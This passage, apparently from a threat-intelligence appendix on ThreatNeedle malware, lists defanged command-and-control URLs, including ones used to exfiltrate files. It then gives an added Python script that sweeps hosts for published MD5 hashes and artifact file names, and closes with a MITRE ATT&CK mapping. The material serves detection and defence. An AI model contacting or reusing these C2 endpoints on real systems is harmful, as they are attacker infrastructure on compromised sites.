hxxps://ryanmcbain[.]com/forum/core/cache/upload[.]php
hxxps://shinwonbook.co[.]kr/basket/pay/open[.]asp
hxxps://shinwonbook.co[.]kr/board/editor/upload[.]asp
hxxps://theforceawakenstoys[.]com/vBulletin/core/cache/upload[.]php
hxxps://www.automercado.co[.]cr/empleo/css/main[.]jsp
hxxps://www.curiofirenze[.]com/include/inc-site[.]asp
hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php
hxxps://www.dronerc[.]it/forum/uploads/index[.]php
hxxps://www.dronerc[.]it/shop_testbr/Adapter/Adapter_Config[.]php
hxxps://www.edujikim[.]com/intro/blue/view[.]asp
hxxps://www.edujikim[.]com/pay/sample/INIstart[.]asp
hxxps://www.edujikim[.]com/smarteditor/img/upload[.]asp
hxxps://www.fabioluciani[.]com/ae/include/constant[.]asp
hxxps://www.fabioluciani[.]com/es/include/include[.]asp
hxxp://www.juvillage.co[.]kr/img/upload[.]asp
hxxps://www.lyzeum[.]com/board/bbs/bbs_read[.]asp
hxxps://www.lyzeum[.]com/images/board/upload[.]asp
hxxps://martiancartel[.]com/forum/customavatars/avatars[.]php
hxxps://www.polyboatowners[.]com/css/indicator[.]php
hxxps://www.sanlorenzoyacht[.]com/newsl/include/inc-map[.]asp
hxxps://www.raiestatesandbuilders[.]com/admin/installer/installer/index[.]php
hxxp://156.245.16[.]55/admin/admin[.]asp
hxxp://fredrikarnell[.]com/marocko2014/index[.]php
hxxp://roit.co[.]kr/xyz/mainpage/view[.]asp

Second stage C2 address
hxxps://www.waterdoblog[.]com/uploads/index[.]asp
hxxp://www.kbcwainwrightchallenge.org[.]uk/connects/dbconn[.]asp

C2 URLs to exfiltrate files used by Trojanized VNC Uploader
hxxps://prototypetrains[.]com:443/forums/core/cache/index[.]php
hxxps://newidealupvc[.]com:443/img/prettyPhoto/jquery.max[.]php
hxxps://mdim.in[.]ua:443/core/cache/index[.]php
hxxps://forum.snowreport[.]gr:443/cache/template/upload[.]php
hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp
hxxps://www.dellarocca[.]net/it/content/img/img[.]asp
hxxps://www.astedams[.]it/photos/image/image[.]asp
hxxps://www.geeks-board[.]com/blog/wp-content/uploads/2017/cache[.]php
hxxps://cloudarray[.]com/images/logo/videos/cache[.]jsp
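A typical first use of the file indicators above is a host sweep: hash files under the paths the post names and compare them against the published MD5s, while also flagging the artifact file names the installer and loader leave behind (bcdbootinfo.tlp, the Startup-folder shortcut, the .sys names under system32). The following is an added example, not code from the Securelist post, that does exactly that; the hashes are a subset copied from Appendix I, and the self-check at the bottom writes constructed files into a temporary directory rather than touching the real system.

```python
# Added example, not from the Securelist post: a minimal host sweep that checks
# files against the MD5 hashes and artifact file names published in Appendix I.
# The hashes below are a subset copied from the post; the artifact names are the
# paths the post attributes to the installer and loader. The self-check at the
# bottom writes CONSTRUCTED files into a temporary directory; nothing on the
# real system is touched.
import hashlib
import os
import tempfile
from typing import Dict, Iterable, List, Set

THREATNEEDLE_MD5: Set[str] = {
    "e7aa0237fc3db67a96ebd877806a2c88",  # Boeing_AERO_GS.docx
    "b191cc4d73a247afe0a62a8c38dc9137",  # %APPDATA%\Microsoft\DRM\logon.bin
    "36ab0902797bd18acd6880040369731c",  # %SYSTEMROOT%\LogonHours.sys
    "87fb7be83eff9bea0d6cc95d68865564",  # %SYSTEMROOT%\SysWOW64\wmdmpmsp.sys
    "062a40e74f8033138d19aa94f0d0ed6e",  # %APPDATA%\microsoft\OutIook.db
}
# File names the post ties to ThreatNeedle components (compared case-insensitively).
ARTIFACT_NAMES: Set[str] = {
    "bcdbootinfo.tlp", "lconcaches.db", "onedrives.lnk", "nwsapagent.sys",
    "srservice.sys", "nwcworkstation.sys", "wmdmpmsp.sys", "pcaudit.sys", "helpsvc.sys",
}


def md5_file(path: str, chunk: int = 1 << 20) -> str:
    """Stream the file so large artifacts do not have to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(roots: Iterable[str], hashes: Set[str] = THREATNEEDLE_MD5,
          names: Set[str] = ARTIFACT_NAMES) -> List[Dict[str, object]]:
    """Walk each root; report files whose name or MD5 matches the indicators."""
    hits = []
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                reasons = []
                if name.lower() in names:
                    reasons.append("artifact_name")
                try:
                    digest = md5_file(path)
                except OSError:
                    continue  # locked or unreadable: skip rather than abort the sweep
                if digest in hashes:
                    reasons.append("ioc_md5")
                if reasons:
                    hits.append({"path": path, "md5": digest, "reasons": reasons})
    return hits


def self_check() -> List[Dict[str, object]]:
    """Build a throwaway directory with one name-based hit, one hash-based hit and
    one clean file, then run the sweep with the constructed file's MD5 added to
    the indicator set. Returns the hits sorted by path."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "bcdbootinfo.tlp"), "wb") as f:
            f.write(b"constructed: 2020-06-10 svcname")
        with open(os.path.join(tmp, "update.tmp"), "wb") as f:
            f.write(b"constructed payload bytes")
        with open(os.path.join(tmp, "readme.txt"), "wb") as f:
            f.write(b"nothing to see")
        constructed_md5 = hashlib.md5(b"constructed payload bytes").hexdigest()
        return sorted(sweep([tmp], hashes=THREATNEEDLE_MD5 | {constructed_md5}),
                      key=lambda h: str(h["path"]))


if __name__ == "__main__":
    for hit in self_check():
        print(hit["reasons"], hit["path"], hit["md5"])
```

On a real host the roots would be the expanded %APPDATA%, %ALLUSERSPROFILE%, %SYSTEMROOT%\system32 and %TEMP% directories from the table above. A name hit is worth a look even without a hash match, since the post notes that each sample’s hard-coded strings differ and hashes change from victim to victim, whereas the installer’s bcdbootinfo.tlp marker and the fixed service-file names do not.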
Appendix II - MITRE ATT&CK Mapping
Tactic               Technique   Technique Name
Initial Access       T1566.002   Phishing: Spearphishing Link
Persistence          T1543.003   Create or Modify System Process: Windows Service
                     T1547.001   Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion      T1140       Deobfuscate/Decode Files or Information
                     T1070.002   Clear Linux or Mac System Logs
                     T1070.003   Clear Command History
                     T1070.004   File Deletion
                     T1036.003   Masquerading: Rename System Utilities
                     T1036.004   Masquerading: Masquerade Task or Service
                     T1112       Modify Registry
Credential Access    T1557.001   LLMNR/NBT-NS Poisoning and SMB Relay
Discovery            T1135       Network Share Discovery
                     T1057       Process Discovery
                     T1016       System Network Configuration Discovery
                     T1033       System Owner/User Discovery
                     T1049       System Network Connections Discovery
                     T1082       System Information Discovery
                     T1083       File and Directory Discovery
                     T1007       System Service Discovery
Lateral Movement     T1021.002   SMB/Windows Admin Shares
Collection           T1560.001   Archive Collected Data: Archive via Utility
Command and Control  T1071.001   Application Layer Protocol: Web Protocol
                     T1132.002   Non-Standard Encoding
                     T1104       Multi-Stage Channels
                     T1572       Protocol Tunneling
                     T1090.001   Internal Proxy
Exfiltration         T1041       Exfiltration Over C2 Channel